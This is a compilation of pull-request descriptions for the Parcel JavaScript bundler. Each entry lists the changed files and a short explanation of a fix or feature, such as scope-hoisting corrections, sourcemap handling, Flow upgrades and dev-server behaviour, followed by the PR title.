@kwelch I think you experienced this recently.
`parcel .` with
```json
{
"source": "index.html",
"app": "dist/index.html",
"targets": {
"app": {}
}
}
```
=> Fix dev server 404 with package.json#source

packages/core/workers/src/backend.js
This introduces an environment variable to explicitly control the worker backend that Parcel uses. This allows using the process backend on Node 12+, which is sometimes necessary to work around issues with some native modules that don't expect to be run from multiple threads.
=> Add PARCEL_WORKER_BACKEND environment variable

packages/core/core/src/BundleGraph.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/applyRuntimes.js, packages/core/core/src/constants.js
Before the addition of bundle content hash references (#4114), `BundleGraph.getHash(bundle)` incorporated the content of all descendant bundles (See #3414 for reasoning). With bundles maintaining stable hash references through packaging and optimizing, this was overkill, so I updated the method. Unfortunately I updated it to not consider they may end up referencing different bundles 😔.
Now all descendant bundle ids are considered in the `BundleGraph.getHash(bundle)` function. This is still a little overkill because bundles usually only reference direct child bundles, but in the future when we add mappings of stable ids to final bundle names for all bundles in entry bundles, we would need to consider every child. Maybe the runtime assets with the mappings could add dependencies to all …
=> Incorporate child bundle ids in BundleGraph.getHash(bundle)

.flowconfig, package.json, yarn.lock
This upgrades flow-bin to 0.119.1, which addresses a crash during rechecks: https://github.com/facebook/flow/releases/tag/v0.119.1
Test Plan: `yarn flow`
=> Upgrade flow to 0.119.1

packages/reporters/cli/src/render.js
This fixes an issue where ora keeps Parcel from receiving key presses, which is necessary for exiting properly when run with `yarn`. Without this option set to false, the shell can get into a weird state where it prints the ANSI escape sequences for arrow keys instead of navigating previous commands.
>Discard stdin input (except Ctrl+C) while running if it's TTY. This prevents the spinner from twitching on input, outputting broken lines on Enter key presses, and prevents buffering of input while the spinner is running.
The discardStdin option defaults to true to avoid this issues above, but I did not witness any of these behaviors when setting it to false. I think it should be okay since we set stdin to raw mode anyway.
Here you can see yarn gives control back to the shell before Parcel …
=> Set ora discardStdin option to false

packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/RequestTracker.js
This fixes an issue where running Parcel after previously exiting Parcel in the middle of building the `AssetGraph` would skip building out the rest of the graph and go straight to bundling.
Ran a clean Parcel build and exited during the `AssetGraph` building phase. Reran and confirmed it finished building out the `AssetGraph` before continuing to bundling.
=> Be sure to run requests that have not produced a valid result

packages/core/utils/package.json, yarn.lock
It seems there are several issues expanding globs in newer versions:
https://github.com/mrmlnc/fast-glob/issues/257
https://github.com/mrmlnc/fast-glob/issues/263
=> Pin fast-glob to 3.1.1

packages/core/core/src/ResolverRunner.js, packages/core/markdown-ansi/src/markdown-ansi.js, packages/core/markdown-ansi/test/markdown-ansi.js, packages/core/parcel-bundler/src/Resolver.js, packages/core/parcel/package.json, packages/core/utils/src/escape-markdown.js, packages/core/utils/src/index.js, packages/core/utils/test/escapeMarkdown.test.js
This pull-request is fix markdown problem in specific directory
If development in like a below directory,  error reports is return wrong output.
```
/my_awesome_projects/foo
```
In the case of CLI (underscore is not shown)
```
Cannot find module 'bar' from '/myawesomeprojects/foo'
```
In the case of Browser, Underscore is not shown and italic text displayed.
Please tell me if you have any problems
=> Fix wrong error reporting in specific directory

packages/core/core/src/Transformation.js, packages/core/core/src/Validation.js, packages/core/integration-tests/test/integration/alias/bar.js, packages/core/integration-tests/test/integration/alias/exclude-local.js, packages/core/integration-tests/test/integration/alias/exclude-package.js, packages/core/integration-tests/test/integration/alias/package-to-local.js, packages/core/integration-tests/test/integration/alias/package-to-package.js, packages/core/integration-tests/test/integration/alias/package.json, packages/core/integration-tests/test/resolver.js, packages/utils/node-resolver-core/src/NodeResolver.js
- In the `pkg#alias` and `pkg#browser` field, a relative path can be specified. So the path needs to be normalized on Windows.
- While debugging this, I found out that the ids in the output bundle (of the identifiers) between Windows and macOS were different. The absolute file path was used in the hash, so I changed that to `path.relative(options.projectRoot, filePath).replace(/\\/g,"/")`.
(cc @padmaia Might be helpful for a multi-user cache?)
Fixes the CI for https://github.com/parcel-bundler/parcel/pull/4275
=> Fix `pkg#alias` on Windows and make asset hash more stable

packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/html-css-doctype/index.css, packages/core/integration-tests/test/integration/html-css-doctype/index.html, packages/core/integration-tests/test/integration/html-css-doctype/index.js, packages/packagers/html/src/HTMLPackager.js
If no html element is present, insert sibling bundles after the doctype or before the first real element (e.g. not comment/whitespace, because a doctype could still follow).
Closes https://github.com/parcel-bundler/parcel/issues/4303
```js
<doctype html>
<script src="...></script>
```
=> Insert sibling bundles after doctype

.flowconfig, package.json, yarn.lock
Release Notes: https://github.com/facebook/flow/releases/tag/v0.120.1
Test Plan: `yarn flow check`.
=> Upgrade to flow 0.120.1

packages/transformers/react-refresh-wrap/src/helpers/helpers.js
Related to #4063, This is crashing my app currently, which is async loading a few components.
=> test for module.hot first

packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/exports-assign.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/exports-define.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/module-exports-assign.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/module-exports-define.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js, packages/shared/scope-hoisting/src/link.js, packages/shared/scope-hoisting/src/shake.js
(This is needed for `babel-types` (v6 that is) to work with scope hoisting.)
We usually resolve `module.exports.foo` to the export id `$...$export$foo`, but if `module.exports` is used freely (see example), we need to bailout that resolving.
```js
var t = module.exports;
module.exports.COMMENT_KEYS = undefined;
Object.defineProperty(module.exports, "COMMENT_KEYS", {
get() {
return [1];
}
});
// or
let v = "COMMENT_KEYS"
module.exports[v] = [1];
console.log(t.COMMENT_KEYS);
```
=> Bailout exports.foo resolving when exports is used freely

flow-libs/terser.js.flow, packages/optimizers/terser/package.json, packages/optimizers/terser/src/TerserOptimizer.js, yarn.lock
This PR removes the hack we used in TerserOptimiser and uses the exposed api by terser for generating a new sourcemap.
This PR is a first of a series of small PRs that will try and improve the accuracy, stability and performance of sourcemaps.
Close T-396
=> T-396 Fix issues with Terser sourcemaps v2

packages/core/core/src/summarizeRequest.js, packages/core/utils/src/md5.js
This fixes an issue where the stream passed into `md5FromStream` has an error (like the file it is trying to open a stream to doesn't exist), but it is not caught inside the process, which causes the process to exit. The WorkerFarm attempts to start a new process and retry the failed request, but this kicks off an infinite loop of crashing the worker and retrying. 
Was able to consistently reproduce this issue in a private project, noticed failure and infinite loop of spinning up workers and retrying failed requests. Implemented fix and noticed no workers exited and the build passed because the request that failed ended up getting removed by a different request.
=> Fix worker crash

packages/core/fs/src/NodeFS.js, packages/core/integration-tests/test/javascript.js
Closes #4382, which doesn't seem to have been the issue. We're probably attempting to rename the file while the file descriptor is still used by the write stream. The `'close'` event on `fs.WriteStream` is emitted after the file descriptor is released, as opposed to simply the `'finish'` event on a `Writable`.
Test Plan: `yarn test` locally and verify CI passes on Windows in Azure.
=> Atomic writes: rename on close, not finish

.flowconfig, flow-libs/posthtml.js.flow, package.json, packages/core/core/src/AssetGraph.js, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/InternalAsset.js, packages/core/core/src/Parcel.js, packages/core/core/src/RequestTracker.js, packages/core/core/src/loadDotEnv.js, packages/core/core/src/loadParcelConfig.js, packages/core/core/src/public/Environment.js, packages/core/core/src/resolveOptions.js, packages/core/core/src/worker.js, packages/core/core/test/loadParcelConfig.test.js, packages/core/logger/src/Logger.js, packages/core/utils/src/glob.js, packages/core/workers/src/WorkerFarm.js, packages/core/workers/src/child.js, packages/core/workers/src/cpuCount.js, packages/optimizers/cssnano/src/CSSNanoOptimizer.js, packages/packagers/css/src/CSSPackager.js, packages/transformers/babel/src/BabelTransformer.js, packages/transformers/html/src/inline.js, packages/transformers/js/src/visitors/fs.js, packages/transformers/postcss/src/PostCSSTransformer.js, packages/utils/node-resolver-core/src/NodeResolver.js, yarn.lock
This:
Flow [now only respects the "primary location" for an error suppression](https://medium.com/flow-type/making-flow-error-suppressions-more-specific-280aa4e3c95c), so any suppressions that no longer apply were removed, and new ones were added.
~~This required a small modification to flowtool as~~ I had to first manually remove an unused suppression in `flow-libs/posthtml.js.flow` as there seems to be a bug where filenames include the string `"[LIB]"`: https://github.com/facebook/flow/issues/8334
=> Upgrade to flow 0.121.0

packages/core/integration-tests/test/integration/scope-hoisting/es6/async-named-import-ns-reexport/async.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/async-named-import-ns-reexport/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/async-named-import-ns-reexport/ns.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/async-named-import-ns-reexport/reexports.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/link.js
When both a parent and child bundle named-import from module that re-exports another module as a namespace, only the parent bundle gets the correct references to values in that namespace. References to the namespace object (a reference of `ns` whose value should be `{foo: 42}`) are rewritten to be the entire exports object of the re-exporter (`{ns: {foo: 42}}`). This is probably better explained by the test.
This PR currently only implements the test for this issue. @mischnic, do you have any insight into how this could be solved?
Test Plan: `yarn test` (currently fails)
=> Scope hoisting: async bundles named-importing a re-exported namespace

packages/core/core/src/BundleGraph.js, packages/core/integration-tests/package.json, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-commonjs-transpiled/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-commonjs-transpiled/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-commonjs-transpiled/c.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-external/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-external/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-external/package.json, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-sideEffects/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-sideEffects/other/exports.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-sideEffects/other/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-sideEffects/other/package.json, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-sideEffects/other/version.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-sideEffects/other/version2.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/concat.js
Supersedes https://github.com/parcel-bundler/parcel/pull/4220
Closes https://github.com/parcel-bundler/parcel/issues/4216
- Don't exclude assets that were imported with a namespace because they themselves might be needed
- This also fixes namespace reexports of excluded assets
We might be able to optimize this further in the future when we have better knowledge of symbols in the bundle graph (https://github.com/parcel-bundler/parcel/pull/4375)
Doing a wildcard import of this (with `sideEffects: false`)
```js
export * from "./exports";
export const Main = "main";
```
would make `Main` disappear because the identifier of that very asset is missing an d was replaced with an empty object: `$parcel$exportWildcard(..., {})`.
cc @wbinnssmith
=> Don't exclude assets that were imported with a namespace

packages/core/core/src/CommittedAsset.js, packages/core/core/src/Parcel.js, packages/core/core/src/Transformation.js, packages/core/core/src/UncommittedAsset.js, packages/core/core/src/Validation.js, packages/core/core/src/assetUtils.js, packages/core/core/src/public/Asset.js, packages/core/core/src/public/Bundle.js, packages/core/core/src/public/BundleGraph.js, packages/core/core/src/public/MutableBundleGraph.js, packages/core/core/src/types.js, packages/core/core/test/AssetGraph.test.js, packages/core/core/test/InternalAsset.test.js, packages/core/core/test/PublicAsset.test.js, packages/transformers/babel/package.json, packages/transformers/babel/src/babel7.js
This is a followup based on my experience implementing parts of #3695, and also integrates some feedback from that PR.
This splits `InternalAsset` into `UncommittedAsset` and `CommittedAsset`. The former implements a mutable interface for transformers, only holding into values in memory (with the exception of generation), and the latter implements an immutable interface that loads content from disk and caches it in memory.
Previously, `InternalAsset` implemented both, in some situations branching on the state. This also allows for simpler implementations in each case. Common code was extracted into `assetUtils.js` in the same directory.
This also cleans up `babel7.js` to safely use `getAST()` and moves it to use the `Async` methods as we don't require synchronous behavior.
Test Plan: …
=> Split InternalAsset into UncommittedAsset and CommittedAsset (Cache ASTs followup)

packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/exports-assign-entry.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/exports-assign-imported.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/exports-assign-reexport-entry.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/exports-assign-reexport.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/exports-define-entry.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/exports-define-imported.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/module-exports-assign-entry.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/module-exports-assign-imported.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/module-exports-define-entry.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/exports-access-bailout/module-exports-define-imported.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js, packages/shared/scope-hoisting/src/link.js
Tests by @wbinnssmith 
Put the check in a more central location where applies to the resolution of member expressions *and* import identifiers:
=> Fixup bailing out exports.symbol resolving when `exports` is used freely

packages/shared/scope-hoisting/src/concat.js
We need to clone the asset ASTs in concat because if a asset is part of multiple bundles and both of these bundles are scheduled on the same worker, then the second time the asset is concatenated it was already modified by code further down the line.
This broke the ak-editor benchmark.
A regression from https://github.com/parcel-bundler/parcel/pull/3695
=> Concat: clone asset ASTs

packages/core/core/src/Transformation.js, packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/html-inline-styles-element/index.html
Closes #4367
(Inline) child assets seemed to actually have a cache collision, because `uniqueKey` (`Transformation#getCacheKey`) wasn't factored in and `hash` and `filePath` are inherited from the parent asset.
=> Use uniqueKey for asset cache key

packages/core/core/src/CommittedAsset.js, packages/core/core/src/Transformation.js, packages/core/core/src/UncommittedAsset.js, packages/core/core/src/assetUtils.js, packages/core/integration-tests/test/integration/custom-config/node_modules/parcel-transformer-mock/index.js, packages/core/types/index.js, packages/shared/babel-ast-utils/src/index.js, packages/transformers/css/src/CSSTransformer.js, packages/transformers/html/src/HTMLTransformer.js, packages/transformers/html/src/inline.js, packages/transformers/postcss/src/PostCSSTransformer.js, packages/transformers/posthtml/src/PostHTMLTransformer.js, packages/transformers/typescript-tsc/src/TSCTransformer.js, packages/transformers/typescript-types/src/TSTypesTransformer.js
This renames `code` to `content` in `GenerateOutput` and `TransformerResult`. This way, whenever `code` is referred to throughout Parcel (such as in `ResolveResult` and `RuntimeAsset`), it's a string, and whenever the main asset content or generated content is referred to, it's a blob named `content`.
This also makes `TransformerResult` a strict object type, which revealed a few bugs that were fixed as a result.
=> Rename "code" to "content" in GenerateOutput, TransformerResult

packages/reporters/dev-server/src/Server.js, packages/reporters/dev-server/src/ServerReporter.js
This sets the server state to `pending` after `buildStart` and clears it after `buildError` (it was already cleared on `buildSuccess`). This holds requests open during subsequent builds so that stale bundles aren't served during build.
Test Plan:
In both the kitchen-sink and react-hmr examples:
* Clear cache.
* Introduce an async `sleep` in the `BundlerRunner` to simulate a long build.
* Start the example with `parcel serve`. Verify that the request for the document is held open until initial build completes. Refresh and verify response doesn't wait.
* Make a change, refresh the page, and verify that the request is held open until build completes. Verify the change is reflected.
* For HMR, make another change without refreshing the browser and verify HMR continues to function.
* Introduce …
=> Server: hold requests open during rebuilds

packages/core/integration-tests/test/integration/html-js-dynamic/index.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/interop-require-es-module-code-split-intermediate/main.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/interop-require-es-module-code-split/main.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/require-resolve-excluded/a.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/wrap-module-codesplit/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/async-named-import-ns-reexport/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/dynamic-default-interop/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/dynamic-import-dynamic/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/dynamic-import/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-commonjs/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/import-namespace-external/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-split/a.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/test-utils/src/utils.js
This adjusts test-utils's `run(bundleGraph, ...)` to consider the output format of the bundle it runs. This means that if the target is `global`, `output` will be used to retrieve the main export in scope hoisted bundles and `parcelRequire` will be used without scope hoisting.
Likewise, in commonjs bundles, `module.exports` will be used as the bundle exports.
 Existing tests and assertions have been adjusted to reflect their output format.
=> test-utils: adjust run() to consider outputFormat

packages/core/core/src/BundleGraph.js, packages/core/core/src/public/BundleGraph.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-bundle-boundary-side-effects/async.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-bundle-boundary-side-effects/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-bundle-boundary-side-effects/switcher/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-bundle-boundary-side-effects/switcher/package.json, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-bundle-boundary-side-effects/types/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-bundle-boundary/async.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-bundle-boundary/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-bundle-boundary/switcher/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-bundle-boundary/types/index.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/types/index.js, packages/shared/scope-hoisting/src/link.js
In `replaceImportNode`, we shouldn't blindly use `originalModule` but instead the first asset after we crossed the bundle boundary (which will be exported by that other bundle via `referencedAssets`). This is achieved by making `BundleGraph#resolveSymbol` stop once the optional parameter `boundary` bundle was "left".
cc @wbinnssmith 
Assets: a imports b which reexport c
Bundles: (a, b) and (c).
The import above should add a bundle import to the bundle with c. Previously we used `originalModule` which would be b (and therefore a bundles tried to import itself).
=> Correct `addBundleImport`s with  re-exports across bundle boundaries

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/public/MutableBundleGraph.js, packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/async-entry-shared/async.js, packages/core/integration-tests/test/integration/async-entry-shared/index.js, packages/core/integration-tests/test/integration/async-entry-shared/scope-hoisting.js, packages/core/integration-tests/test/integration/async-entry-shared/value.js, packages/core/integration-tests/test/integration/sync-entry-shared/async.js, packages/core/integration-tests/test/integration/sync-entry-shared/index.js, packages/core/integration-tests/test/integration/sync-entry-shared/value.js, packages/core/integration-tests/test/javascript.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/types/index.js, packages/runtimes/js/src/JSRuntime.js, packages/shared/scope-hoisting/src/formats/global.js, packages/shared/scope-hoisting/src/link.js, packages/shared/scope-hoisting/src/utils.js
Depends on #4391.
When a bundle `a`'s entry asset is present in bundle `b`, share bundle `a` by placing it (and its siblings) in `b`'s bundle group. This takes place in optimization in a similar way as other shared bundle extraction. See tests for  examples. 
This required making scope hoisted bundles always register init functions. @mischnic may have a better idea or may remove this with the symbol propagation work.
=> Share bundles when their entries exist in others

flow-libs/babel-traverse.js.flow, packages/core/integration-tests/test/output-formats.js, packages/shared/scope-hoisting/src/formats/commonjs.js, packages/shared/scope-hoisting/src/formats/esmodule.js, packages/shared/scope-hoisting/src/formats/global.js, packages/shared/scope-hoisting/src/link.js, packages/shared/scope-hoisting/src/shake.js, packages/shared/scope-hoisting/src/types.js, packages/shared/scope-hoisting/src/utils.js
Remove `path.crawl()` calls after the linking phase (so for the imports/exports and shaking).
This brings it down from `O(2) + O((number of global bindings)^2)` per bundle to `O(1)`. 
(So if `path.crawl()` is `O(n^2)`, this would switch from `O(n^4)` to `O(n^2)`)
I plan on removing the last call in `link.js` as well in a follow up, but this PR should contain most of the performance benefits and I want to avoid rebasing this once again.
This is my 5th ~4th~ attempt at this - first for Parcel 1, then for Parcel 2, then trying to make `path.unshiftContainer` et al. smarter but I ended up reimplementing babel-traverse)
=> Remove crawl calls in shake & outputformat

packages/core/core/src/AssetGraphBuilder.js
This PR skips validation if there are no validators configured for any of the changed assets so we can skip loading files and hashing them for no reason. 
We should also consider not loading files up front and allowing validators to request that content only if they need it, but that can be a follow up task. We also need to look into throttling local worker requests and/or the fs, because currently validating a large project can lead "too many open file" errors.
I was running into "too many open file" errors because validation was reading every asset in the graph at once even though we had no validators configured. This change resolved the issue.
=> Skip validation requests if there are no validators configured

packages/core/integration-tests/test/integration/scope-hoisting/commonjs/tree-shaking-no-unknown-objects/a.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/tree-shaking-no-unknown-objects/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-no-unknown-objects/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-no-unknown-objects/index.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/link.js, packages/shared/scope-hoisting/src/shake.js
This changes `shake.js`'s `isExport` to only consider `AssignmentExpression`s to known exports objects as removable. This prevents tree shaking from removing assignments to imports that corresponded to unknown objects.
This involved updating a tree shake test to only ensure that it removes an assignment to the export object, as it appears terser should remove the export corresponding identifier.
Thanks @devongovett for the suggestion of using the `exportsMap` 😄
Test Plan: Added an integration test. `yarn test`.
=> Don't treeshake assignments to unknown objects

packages/core/integration-tests/test/integration/less-url-behavior/index.less, packages/core/integration-tests/test/less.js, packages/transformers/less/src/LessTransformer.js
Ignore this syntax in less assets as well (pure CSS support added in https://github.com/parcel-bundler/parcel/pull/3887).
```css
.lvml {
behavior: url(#default#VML);
display: inline-block;
position: absolute;
}
```
cc @iamyellow @pojntfx
=> Ignore `url(#...)` (`behavior` property) in Less assets

packages/shared/babel-ast-utils/src/index.js, yarn.lock
When the Babel transformer didn't run (e.g. node_modules), a parse error in the JSTransformer didn't throw a codeframe.
Also bump Babel because they once again made a change to their internal file structure: https://github.com/babel/babel/issues/11439
=> Codeframe for babel-ast-utils parse

packages/core/core/src/public/MutableBundleGraph.js
This corrects an oversight from #4391 where bundles in a group were unconditionally removed from the graph if their parent group was. Bundles can belong to multiple groups, however.
cc @highvoltag3
=> removeBundleGroup: Only remove bundles entirely if they are only part of this group

packages/utils/node-libs-browser/package.json
Resolves #4357.
This downgrades the bundled `punycode` module part of `@parcel/node-browser-libs` to the 1.x range, which is distributed as es5.
Test Plan: 
* Prepare the kitchen sink example to run in ie 11 by temporarily adding ie 11 to default engines.
* import`punycode` and log its export in the kitchen sink example.
* Run the development server and connect to it from ie 11.
* Verify there are no syntax errors and that the punycode object is logged to the console.
=> Use punycode 1.x for IE 11/es5 compatibility

packages/core/integration-tests/package.json, packages/core/integration-tests/test/integration/html-shared-worker/index.js, packages/core/integration-tests/test/integration/html-shared-worker/worker.js, packages/core/integration-tests/test/javascript.js, packages/core/integration-tests/test/typescript.js, packages/core/test-utils/src/utils.js, packages/runtimes/js/src/JSRuntime.js, packages/runtimes/js/src/bundle-url.js
Caused by #4469 and #4391, this broke the REPL.
- Use the last bundle in a bundle group for url-like dependencies
- Make getBundleURL use `document.currentScript` if possible, to enable testing this. (A suitable test for this actually already existed, it was just not asserted.)
cc @wbinnssmith You added the `firstBundle` part in the internalize-async PR. 
The main bundle importing a worker url would use the first bundle in the bundlegroup (in this case the bundle group has a shared bundle and the worker). 
The result was: `new Worker("./worker")` would incorrectly do `new Worker("./shared-bundle")`.
=> JSRuntime: take URL of last bundle in bundle group

packages/transformers/react-refresh-wrap/src/helpers/helpers.js
Close T-449
The `if(unrecoverableError) location.reload()` check was always executed (so on startup). Now it only happens on `module.hot.dispose(...)` so that it only executes when an HMR update happens.
```js
import React, { Suspense, lazy, useState } from "react";
const Async = lazy(() => {});
import("./Async")
let App = () => {
const [x] = useState(Math.random());
return (
<Suspense fallback={"Loading"}>
{x} <Async />
</Suspense>
);
};
export default App;
```
I wasn't able test this because https://github.com/facebook/react/issues/18768 breaks JSDOM's error handling.
Can be added later on as part of the ongoing cross-bundler React Refresh test suite project.
=> Fix page reload loop with React Refresh

packages/core/core/src/BundleGraph.js, packages/core/core/src/public/BundleGraph.js, packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/shared-many-esm/a.html, packages/core/integration-tests/test/integration/shared-many-esm/a.js, packages/core/integration-tests/test/integration/shared-many-esm/b.html, packages/core/integration-tests/test/integration/shared-many-esm/b.js, packages/core/integration-tests/test/integration/shared-many-esm/c.html, packages/core/integration-tests/test/integration/shared-many-esm/c.js, packages/core/integration-tests/test/integration/shared-many-esm/d.html, packages/core/integration-tests/test/integration/shared-many-esm/d.js, packages/core/integration-tests/test/integration/shared-many-esm/e.html, packages/core/integration-tests/test/integration/shared-many-esm/e.js, packages/core/integration-tests/test/integration/shared-many-esm/f.html, packages/core/integration-tests/test/integration/shared-many-esm/f.js, packages/core/integration-tests/test/integration/shared-many-esm/g.html, packages/core/integration-tests/test/integration/shared-many-esm/g.js, packages/core/types/index.js, packages/shared/scope-hoisting/src/link.js
Previously, we would import from the first bundle containing the asset when it wasn't in the current bundle in scope hoisting. This was incorrect because it could have been from a different part of the site completely rather than a bundle that was already loaded in the current bundle's ancestry.
This PR finds a reachable bundle containing the asset to import from the current bundle. This includes sibling bundles as well as ancestors and siblings of ancestors. It follows a similar algorithm to the one I added in #4295, but returns the first bundle it finds containing the asset rather than checking if all of the ancestors contain it. This is verified by ensuring that any ESM import is already loaded by the parent HTML file.
=> Import asset from reachable bundle in ESM output format

packages/core/parcel/README.md
I believe the `package.json` example has an out of date format for it's targets section, specifically missing the `engines` key. Was seeing this error when I tried the old format:
```
Invalid target descriptor for target "main"
^^^^^^ Possible values: "context", "includeNodeModules", "outputFormat", "distDir", "publicUrl", "isLibrary", "sourceMap", "engines", "minify"
```
=> [README only] update package.json target definition

packages/core/core/src/public/PluginOptions.js, packages/core/core/src/resolveOptions.js, packages/core/core/src/types.js, packages/core/parcel/src/cli.js, packages/core/types/index.js, packages/reporters/cli/package.json, packages/reporters/cli/src/CLIReporter.js, packages/reporters/cli/src/bundleReport.js, packages/reporters/cli/test/CLIReporter.test.js
This PR adds a flag for `--detailed-report` similar to Parcel 1, defaulting to not outputting assets, and outputting 10 largest assets when used and optionally allowing adding the amount of assets you'd like to show.
=> Add `--detailed-report` flag

packages/core/core/src/PackagerRunner.js, packages/core/core/src/TargetResolver.js, packages/core/core/test/TargetResolver.test.js, packages/core/core/test/fixtures/common-targets-ignore/package.json, packages/core/integration-tests/test/scope-hoisting.js, packages/core/integration-tests/test/sourcemaps.js, packages/core/types/index.js, packages/packagers/js/src/JSPackager.js
Closes #4390
Previously, we relied on plugins to not return sourcemaps if `target.sourceMap` is false. 
But the non-hoisting JSPackager without running TerserOptimizer afterwards would still emit a sourcemap and therefore write a sourcemap file to dist despite of `--no-source-maps`
~Sourcemaps can be specified per target, but they are only accessible on `PluginOptions` (a boolean from the cli flag) and on `Target` (the actual settings object). So it would make sense to remove it from the `PluginOptions` and put them on `Target` only (and normalizing the value in the target resolver), but then transformers wouldn't know if sourcemaps are enabled.~
=> Really no sourcemaps

packages/core/core/src/TargetResolver.js, packages/core/core/test/TargetResolver.test.js
Regression from https://github.com/parcel-bundler/parcel/pull/4528 found by @wbinnssmith
=> Write sourcemaps for the serve mode's default target again

packages/bundlers/default/src/DefaultBundler.js, packages/core/integration-tests/test/integration/shared-sibling-scope-hoist/a.js, packages/core/integration-tests/test/integration/shared-sibling-scope-hoist/b.js, packages/core/integration-tests/test/integration/shared-sibling-scope-hoist/c.js, packages/core/integration-tests/test/integration/shared-sibling-scope-hoist/index.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/generate.js
Following #4295 and #4545, we ran into some cases where we received the `No reachable bundle found containing ${asset}` error in scope hoisting. After much debugging, I determined that this was due to bundles being deduplicated in the wrong order. For example, a deeper asset might get removed from one bundle, and later an ancestor might get removed from another bundle. When we remove this ancestor, we'd also remove the child. This could result in no bundles in a bundle group containing the required child asset, because it got removed along with the ancestor.
This PR ensures that we consider all bundles for an asset at the same time, following asset graph order. This way, parent assets are always considered before children.
@wbinnssmith also came across a case where shared bundles were …
=> Deduplicate bundles following asset graph order

packages/core/integration-tests/test/output-formats.js, packages/utils/node-libs-browser/package.json, yarn.lock
This upgrades the minimum necessary version of `util` to `0.12.3`, which has better support for IE 11: https://github.com/browserify/node-util/pull/47
=> node-libs-browser: require util^0.12.3

packages/core/integration-tests/test/integration/scope-hoisting/es6/async-interop-conditional/async.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/async-interop-conditional/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/async-interop-conditional/value.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/link.js
Similar to #4487, conditionally referencing an imported symbol originating from another bundle causes the binding to be inserted at the first reference.
This seems to only occur when the conditional reference is in a `switch` case clause that is not a block.
This PR also makes `binding` and `parent` invariant rather than conditionally used.
To do:
Test Plan: Added test
=> Scope hoisting: conditional reference of an imported, interopDefault symbol from another bundle in a case clause

